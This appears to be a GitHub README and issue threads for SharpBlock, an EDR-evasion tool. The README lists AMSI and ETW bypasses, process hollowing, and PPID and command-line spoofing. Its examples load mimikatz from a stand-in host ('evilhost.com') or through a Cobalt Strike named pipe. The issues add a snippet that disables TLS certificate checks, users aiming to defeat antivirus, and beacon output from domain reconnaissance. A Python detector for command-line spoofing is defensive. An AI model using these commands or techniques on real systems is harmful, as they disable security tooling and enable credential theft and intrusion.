SharpBlock

A method of bypassing an EDR's active protection DLLs by preventing their entry point from executing.

Features

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using a stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when the callee is within the range of a blocked DLL's address space.

Usage

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL:

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using a Cobalt Strike beacon over a named pipe, using notepad as the host process and blocking SylantStrike's DLL:

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note: for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager.
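The post-creation command-line spoofing listed in the features above gives a defender one concrete thing to check: the arguments recorded when a process was created should still match what the live process reports later. The Python below is an added illustration, not SharpBlock code; it runs over constructed sample records, and the field names are an assumed schema rather than any vendor's.

```python
"""Flag processes whose live command line no longer matches the one recorded
at creation (the pattern SharpBlock's feature list describes as spoofing and
implanting args after process creation).  Added example, not SharpBlock code."""
import re
from typing import Dict, List

# Constructed sample telemetry.  Field names are an assumption: a creation-time
# record (what a Sysmon/EDR process-start event would capture) and a later
# snapshot of the command line read back from the running process.
CREATION_EVENTS = [
    {"pid": 204,   "image": r"c:\windows\system32\cmd.exe",     "cmdline": "cmd.exe",                  "ppid": 1234},
    {"pid": 17896, "image": r"c:\windows\system32\notepad.exe", "cmdline": "notepad.exe",              "ppid": 1234},
    {"pid": 4242,  "image": r"c:\windows\system32\notepad.exe", "cmdline": "notepad.exe  C:\\notes.txt", "ppid": 900},
]
RUNTIME_SNAPSHOTS = [
    {"pid": 204,   "cmdline": ""},                          # args blanked after creation
    {"pid": 17896, "cmdline": "notepad.exe coffee"},        # args injected after creation
    {"pid": 4242,  "cmdline": "notepad.exe C:\\notes.txt"}, # benign: only whitespace differs
]


def normalize(cmdline: str) -> str:
    """Collapse whitespace and case so cosmetic differences are not flagged."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def find_cmdline_tampering(created: List[Dict], live: List[Dict]) -> List[Dict]:
    """Return one finding per PID whose live command line differs from the one
    logged at creation.  Few legitimate programs rewrite their own PEB command
    line, so each mismatch is worth an analyst's look."""
    at_start = {e["pid"]: e for e in created}
    findings = []
    for snap in live:
        start = at_start.get(snap["pid"])
        if start is None:
            continue  # no creation record for this PID; nothing to compare
        if normalize(start["cmdline"]) != normalize(snap["cmdline"]):
            findings.append({"pid": snap["pid"], "image": start["image"],
                             "created_with": start["cmdline"], "now": snap["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in find_cmdline_tampering(CREATION_EVENTS, RUNTIME_SNAPSHOTS):
        print(f"[!] pid {f['pid']} ({f['image']}): created with {f['created_with']!r}, now {f['now']!r}")
```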

Accompanying Blog Posts:

Contributors

ccob
sharpblock's Issues

LoadProcessFromWeb does not work with an invalid or expired SSL certificate

[!] SharpBlock failed with error The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
   at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
   at System.Net.WebClient.DownloadData(Uri address)
   at SharpBlock.Program.LoadProcessFromWeb(String url)
   at SharpBlock.Program.LoadProcessData(String path)
   at SharpBlock.Program.ReplaceExecutable(IntPtr hProcess, IntPtr hThread, String path)
   at SharpBlock.Program.Main(String[] args)

I used the code below to solve the problem:

// Accepts every server certificate, including invalid or expired ones (disables TLS certificate validation)
ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

I want to add an option to ignore certificate errors.

Fails to load simple c# exe.

I have a simple C# exe that is reflecting bytes in memory. I'd like to use this tool to crush Avast/AVG since they're protecting AMSI. Not really sure what I'm doing wrong. I'm executing it through cmd using your example, but SharpBlock is always throwing an error; I compiled it as is, no changes. Like, I know I don't understand the code too well, but I think I'm understanding what the tool is supposed to do. Bro, I must be doing something wrong; do I need to compile my exe a certain type of way?

Failed to create process nltest.exe with error 2

Thanks for the amazing work.
I was successfully able to run the nltest /dclist: command and a DLL to patch initially.

I tried after a few days but with a different beacon, and now I get an error: Failed to create process nltest.exe with error 2. This is the command I execute: SharpBlock.exe -e nltest.exe -a /dclist: -n XYZ.dll

Below is the response:

[*] Tasked beacon to run .NET program: SharpBlock.exe -e nltest.exe -a /dclist: -n XYZ.dll
[+] host called home, sent: 219777 bytes
[+] received output:
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64 


[+] received output:
[+] in-proc amsi 0x00007ffe7a860000
[+] in-proc ntdll 0x00007ffe90580000
[!] Failed to create process nltest.exe with error 2

Any idea what can be corrected here?

PowerShell issue

Hi and thanks for the great work!

I've got a problem though. If I want to open powershell instead of cmd the process gets closed immediately.

Do you know why?

Block Multiple DLLs ?

Is it possible to block multiple DLLs? cmd and powershell crash when given multiple DLL names.

For example:
.\sharpblock.exe -n "dll1.dll" -n "dll2.dll" --disable-bypass-amsi -e "c:\windows\system32\windowspowershell\v1.0\powershell.exe" --disable-bypass-etw --disable-header-patch -w


Multiple Exceptions when running SharpBlock

I cloned the repo and built it with .Net FW 4.5.

After building and running SharpBlock (with a double click) I receive the following errors.

No defender is activated btw.

What did I do wrong?


Detection AMSI

Hi,

Compiled it and it got flagged by AMSI.

./sharpblock.exe


SharpBlock failed with error: Failed to read memory, PartialCopy

Hi,

When executing the following command I get an error:

SharpBlock.exe -w -e C:\...\test.exe
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ff9ef520000
[+] in-proc ntdll 0x00007ffa11230000
[+] Launched process C:\...\test.exe with PID 17896
[!] SharpBlock failed with error Failed to read memory, PartialCopy
   at SharpSploit.Execution.DynamicInvoke.Native.NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32& NumberOfBytesToRead)
   at SharpBlock.Program.ReadBytes(IntPtr hProcess, IntPtr address, Int32 size) in C:\...\SharpBlock-master\Program.cs:line 373
   at SharpBlock.Program.ReadMovAddress(IntPtr hProcess, IntPtr address) in C:\...\SharpBlock-master\Program.cs:line 161
   at SharpBlock.Program.UpdateCommandLine(IntPtr hProcess, String args) in C:\...\SharpBlock-master\Program.cs:line 192
   at SharpBlock.Program.Main(String[] args) in C:\...\SharpBlock-master\Program.cs:line 763

I'm trying to execute a simple C# script that executes a reverse shell using shellcode (Program.cs) in order to test an EDR.

What am I doing wrong?

Thx for the awesome project

Exception 0x800000003

It appears to be a non-fatal error but I'm getting similar errors on multiple machines.

Windows [Version 10.0.18363.1440]

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ffa54d10000
[+] in-proc ntdll 0x00007ffa73fa0000
[+] Launched process c:\windows\system32\cmd.exe with PID 204
Exception 0x80000003 occured at 0x7ffa74070f8c
        Parameter: 0x0
[+] Updated command line args with ""
Exception 0x80000003 occured at 0x7ffa74070f8c
        Parameter: 0x0

Windows [Version 10.0.19042.1083]

C:\Tools\SharpBlock\bin\x64\Release>SharpBlock.exe
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x86_64

[+] in-proc amsi 0x00007ffc654b0000
[+] in-proc ntdll 0x00007ffc7ff10000
[+] Launched process c:\windows\system32\cmd.exe with PID 18516
Exception 0x80000003 occured at 0x7ffc7ffe0770
        Parameter: 0x0
[+] Updated command line args with ""
Exception 0x80000003 occured at 0x7ffc7ffe0770
        Parameter: 0x0

Everything else appears to work fine in that cmd is actually running with that PID in the background, just I don't remember seeing those error messages last time I used SharpBlock.

0x7ffc7ffe0770 is an 0xCC (Int 3) in ntdll.dll which I believe is causing the exception:


Exception is raised here (line 967 Program.cs):

if (ExceptionDebugInfo.dwFirstChance == 0 && ExceptionDebugInfo.ExceptionRecord.ExceptionCode != WinAPI.EXCEPTION_SINGLE_STEP) {
    Console.WriteLine($"Exception 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionCode:x} occured at 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionAddress.ToInt64():x}");
    for (int idx = 0; idx < ExceptionDebugInfo.ExceptionRecord.NumberParameters; ++idx) {
        Console.WriteLine($"\tParameter: 0x{ExceptionDebugInfo.ExceptionRecord.ExceptionInformation[idx]}");
    }
}

Thank you for a really great tool, anything I can do to help troubleshoot, please let me know
